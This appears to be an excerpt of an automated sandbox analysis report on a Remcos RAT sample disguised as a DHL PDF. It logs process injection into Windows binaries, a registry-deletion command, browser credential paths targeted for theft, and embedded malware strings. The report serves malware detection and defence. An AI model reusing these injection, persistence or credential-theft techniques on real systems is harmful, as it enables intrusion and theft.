              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D80000Jump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 50600000Jump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D90000Jump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2DA0000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D30000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D40000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2D50000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2DE0000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 2DF0000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 3000000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 3010000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 3020000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 3030000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 3040000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 3050000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 50600000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 3060000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\mobsync.exe base: 3070000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 2F50000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 2F60000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 2F70000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3200000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3210000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3220000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3230000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3240000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3250000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3260000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3270000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 50600000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3280000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory written: C:\Windows\SysWOW64\secinit.exe base: 3290000Jump to behavior
              Allocates memory in foreign processesShow sources
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 50600000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2C60000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2C70000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2C80000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D10000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D20000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D30000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D40000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D50000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D60000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D70000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D80000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D90000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2DA0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 50600000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D30000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D40000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2D50000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2DE0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 2DF0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3000000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3010000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3020000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3030000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3040000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3050000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3060000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\mobsync.exe base: 3070000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 50600000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 2F50000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 2F60000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 2F70000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3200000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3210000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3220000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3230000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3240000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3250000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3260000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3270000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3280000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeMemory allocated: C:\Windows\SysWOW64\secinit.exe base: 3290000 protect: page execute and read and writeJump to behavior
              Creates a thread in another existing process (thread injection)Show sources
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2C80000Jump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2D40000Jump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2D80000Jump to behavior
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2DA0000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 2D50000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 3010000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 3050000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\mobsync.exe EIP: 3070000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\secinit.exe EIP: 2F70000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\secinit.exe EIP: 3230000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\secinit.exe EIP: 3270000Jump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeThread created: C:\Windows\SysWOW64\secinit.exe EIP: 3290000Jump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe22_2_0040F4B7
              Source: C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.batJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /fJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess created: C:\Windows\SysWOW64\mobsync.exe C:\Windows\System32\mobsync.exeJump to behavior
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeProcess created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exeJump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_00414923 StrToIntA,mouse_event,22_2_00414923
              Source: mobsync.exe, 00000005.00000000.720932112.00000000035A0000.00000002.00020000.sdmp, mobsync.exe, 00000016.00000000.816684928.00000000038C0000.00000002.00020000.sdmpBinary or memory string: Program Manager
              Source: mobsync.exe, 00000005.00000000.720932112.00000000035A0000.00000002.00020000.sdmp, mobsync.exe, 00000016.00000000.816684928.00000000038C0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: mobsync.exe, 00000005.00000000.720932112.00000000035A0000.00000002.00020000.sdmp, mobsync.exe, 00000016.00000000.816684928.00000000038C0000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: mobsync.exe, 00000005.00000000.720932112.00000000035A0000.00000002.00020000.sdmp, mobsync.exe, 00000016.00000000.816684928.00000000038C0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,5_2_00441069
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,5_2_00449143
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_0044926C
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,5_2_00449373
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,22_2_00441069
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,22_2_00449143
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,22_2_0044926C
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoW,22_2_00449373
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,22_2_00449440
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: GetLocaleInfoA,22_2_0040D585
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0042F2AB cpuid 5_2_0042F2AB
              Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_004410D3 GetSystemTimeAsFileTime,5_2_004410D3
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 22_2_0044190C _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,22_2_0044190C
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_004166F6 GetComputerNameExW,GetUserNameW,5_2_004166F6

              Stealing of Sensitive Information:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 1368, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 4108, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: secinit.exe PID: 6644, type: MEMORYSTR
              Contains functionality to steal Firefox passwords or cookiesShow sources
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\22_2_0040A3AF
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: \key3.db22_2_0040A3AF
              Contains functionality to steal Chrome passwords or cookiesShow sources
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data5_2_0040A291
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data22_2_0040A291

              Remote Access Functionality:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 1368, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: mobsync.exe PID: 4108, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: secinit.exe PID: 6644, type: MEMORYSTR
              Detected Remcos RATShow sources
              Source: mobsync.exeString found in binary or memory: Remcos_Mutex_Inj
              Source: mobsync.exe, 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.5 Prov|
              Source: mobsync.exeString found in binary or memory: Remcos_Mutex_Inj
              Source: mobsync.exe, 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.5 Prov|
              Source: secinit.exe, 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
              Source: secinit.exe, 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicence_code.txtSoftware\WDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\SETTINGSoverridepth_unenc3.1.5 Prov|
              Source: C:\Windows\SysWOW64\mobsync.exeCode function: cmd.exe22_2_0040559D

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsScripting1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
              Default AccountsNative API1Registry Run Keys / Startup Folder1Access Token Manipulation1Scripting1Input Capture11Account Discovery1Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsCommand and Scripting Interpreter1Logon Script (Windows)Process Injection322Obfuscated Files or Information2Credentials In Files2File and Directory Discovery2SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Masquerading11NTDSSystem Information Discovery33Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptModify Registry1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion21Cached Domain CredentialsSecurity Software Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol21Jamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsAccess Token Manipulation1DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection322Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
